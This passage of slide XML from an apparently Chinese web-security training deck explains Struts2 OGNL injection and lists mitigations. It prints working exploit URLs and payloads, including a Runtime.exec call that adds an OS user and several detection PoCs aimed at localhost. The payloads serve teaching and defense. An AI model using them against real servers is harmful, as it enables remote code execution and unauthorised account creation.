          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为了防范篡改服务器端对象,XWork的ParametersInterceptor不允</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(me</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>h)=true&amp;(aaa)(('\u0023context[\'xwork.MethodAccessor.den</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dne</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>w%20java.lang.Boolean("false")))&amp;(asdf)(('\u0023rt.exit(1)')(\</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>u0023rt\u003d@java.lang.Runtime@getRuntime()))=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>转义后是这样:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?('#_memberAccess['allowStaticMethodAccess']')(meh)=true</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&amp;(aaa)(('#context['xwork.MethodAccessor.denyMethodExec</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ution']=#foo')(#foo=new%20java.lang.Boolean("false")))&amp;(as</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>df)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OGNL处理时最终的结果就是　　　　</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java.lang.Runtime.getRuntime().exit(1); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java.lang.Runtime.getRuntime().exec("net user 用户名 密码 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/add");//</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>空格,%2F替换/)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只要有权限就可以执行任何DOS命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密Struts2的“神秘”的POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>回显POC(快速检测是否存在（有的s2版本无法输出）,看见输出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[/ok]就表示存在)：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC1:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&amp;(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&amp;('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&amp;(g)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&amp;(i2)(('\43xman.getWriter().println(%22[/ok]%22)')(d))&amp;(i99)(('\43xman.getWriter().close()')(d))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密Struts2的“神秘”的POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC2（类型转换漏洞需要把POC加在整型参数上）:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/Struts2/test.action?id='%2b(%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.struts2.ServletActionContext@getResponse().getWriter().println(%22[/ok]%22))%2b'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密Struts2的“神秘”的POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC3（需要注意这里也必须是加载一个String(字符串类型)的参数后面，使用的时候把URL里面的两个foo替换成目标参数（注意POC里面还有个foo））:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/Struts2/hello.action?foo=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=%20new%20java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]=new%20java.lang.Boolean(true),@org.apache.struts2.ServletActionContext@getResponse().getWriter().println(%22[/ok]%22))&amp;z[(foo)('meh')]=true</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密Struts2的“神秘”的POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC4:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/Struts2/hello.action?class.classLoader.jarPath=(%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d=+new+java.lang.Boolean(false),%23_memberAccess%5b%22allowStaticMethodAccess%22%5d=true,%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23s3cur1ty.println(%22[/ok]%22),%23s3cur1ty.close())(aa)&amp;x[(class.classLoader.jarPath)('aa')]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Struts2:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、  从CDN层可以拦截所有Struts2的请求过滤OGNL执行代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、  从Server层在请求Struts2之前拦截其Ognl执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、  在项目层面可以在struts2的filter加一层拦截</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、  在Struts2可以用拦截器拦截</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、  在Ognl源码包可以拦截恶意的Ognl请求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6、  实在没办法就打补丁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7、  终极解决办法可以考虑使用其他MVC框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞原理:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
